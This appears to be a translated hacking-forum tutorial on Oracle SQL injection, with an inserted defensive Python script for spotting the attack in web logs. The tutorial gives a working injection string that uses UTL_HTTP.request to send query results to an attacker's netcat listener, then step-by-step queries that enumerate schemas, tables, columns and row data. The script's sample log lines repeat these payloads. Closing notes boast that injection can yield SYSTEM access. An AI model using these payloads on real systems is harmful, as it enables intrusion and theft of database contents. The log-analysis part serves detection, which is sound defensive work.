Author: Kindle
MSN: Kindle@live.cn
Blog: http://hi.baidu.com/system_exp
Team: Security Team (http://bbs.exploits.com.cn)
First, start nc listening on the corresponding port on an Internet-facing host.
The URL statement is as follows:
http://www.exploits.com.cn/Kindle?jsp=1 and UTL_HTTP.request('Internet ip:port/'||(SQL statement))=1--
The injected part is:
and UTL_HTTP.request('Internet ip:port/'||(SQL statement))=1--
The result of the SQL statement is appended to the requested path, so it shows up in the nc output.
Enumerating databases (owners):
select owner from all_tables where rownum=1
select owner from all_tables where owner<>'first database name' and rownum=1
select owner from all_tables where owner<>'first database name' and owner<>'second database name' and rownum=1
And so on.
Enumerating tables:
select TABLE_NAME from all_tables where owner='database name' and rownum=1
select TABLE_NAME from all_tables where owner='database name' and rownum=1 and TABLE_NAME<>'table name 1'
select TABLE_NAME from all_tables where owner='database name' and rownum=1 and TABLE_NAME<>'table name 1' and TABLE_NAME<>'table name 2'
And so on.
Enumerating columns:
select COLUMN_NAME from user_tab_columns where table_name='table name' and rownum=1
select COLUMN_NAME from user_tab_columns where table_name='table name' and rownum=1 and COLUMN_NAME<>'first column name'
select COLUMN_NAME from user_tab_columns where table_name='table name' and rownum=1 and COLUMN_NAME<>'first column name' and COLUMN_NAME<>'second column name'
Extracting content:
First content: select column name from table name where rownum=1
Second content: select column name from table name where rownum=1 and column name<>'first value'
Third content: select column name from table name where rownum=1 and column name<>'first value' and column name<>'second value'
And so on.
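Added example (not part of the original article): every follow-up request in the sequences above excludes the values already returned, so the web server's access log records both the listener address and what has leaked so far. The Python sketch below recovers that from log lines; the log format, hosts, paths and table names are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format); every host, path and name is made up.
SAMPLE_LOG = [
    '203.0.113.9 - - [01/Jan/2024:10:00:00 +0000] "GET /item.jsp?id=7 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /item.jsp?id=7%20and%20UTL_HTTP.request(%27198.51.100.4:8080/%27||(select%20owner%20from%20all_tables%20where%20rownum=1))=1-- HTTP/1.1" 500 0',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /item.jsp?id=7%20and%20UTL_HTTP.request(%27198.51.100.4:8080/%27||(select%20owner%20from%20all_tables%20where%20owner%3C%3E%27SYS%27%20and%20rownum=1))=1-- HTTP/1.1" 500 0',
    '203.0.113.9 - - [01/Jan/2024:10:02:41 +0000] "GET /item.jsp?id=7%2520AND%2520utl_http.REQUEST(%2527198.51.100.4:8080/%2527||(select%2520LOGIN%2520from%2520APP_USERS%2520where%2520rownum=1%2520and%2520LOGIN%253C%253E%2527alice%2527))=1-- HTTP/1.1" 500 0',
]

REQ = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
OOB = re.compile(r"utl_http\s*\.\s*request\s*\(\s*'([^']*)'", re.I)   # first literal = listener
SUBQ = re.compile(r"select\s+(\w+)\s+from\s+(\w+)", re.I)
EXCL = re.compile(r"<>\s*'([^']*)'")                                  # values already returned

def normalise(url):
    """Decode until stable (undoes double encoding), then drop /* */ comments."""
    prev = None
    while prev != url:
        prev, url = url, unquote_plus(url)
    return re.sub(r"/\*.*?\*/", " ", url)

def stage(column, view):
    """Map the embedded subquery to the enumeration step it belongs to."""
    column, view = column.lower(), view.lower()
    if view == "all_tables":
        return "schemas" if column == "owner" else "tables"
    if view == "user_tab_columns":
        return "columns"
    return "data"

def analyze(lines):
    findings = []
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue
        url = normalise(m.group(2))
        oob = OOB.search(url)
        if not oob:
            continue
        sub = SUBQ.search(url, oob.end())
        findings.append({
            "client": m.group(1),
            "callback": oob.group(1).rstrip("/"),          # outbound destination to block and hunt for
            "stage": stage(*sub.groups()) if sub else "unknown",
            "target": sub.group(2) if sub else None,
            "already_leaked": EXCL.findall(url),           # literals the client could only know from earlier replies
        })
    return findings

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

The callback value is also the destination to look for in database-host egress logs; a database server that has no reason to make outbound HTTP requests should not be able to reach it.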
Now let's go back and look at the "hichina embarrassing-web ORACLE injection vulnerability exposure": http://bbs.exploits.com.cn/read.php?tid-144.html
Is it clear now? o(∩_∩)o ... haha
Note:
1: On Windows, Oracle is started as a service, so SYSTEM permission can be obtained directly through web injection (this part of the content is still being sorted and tested, in order to provide more intuitive, concise, and effective reference material).
2: Oracle on Unix and Linux operating systems will also be analyzed. I believe Oracle injection will become a bridge for advanced hack intrusion.
3: This is a series of articles and will be updated later.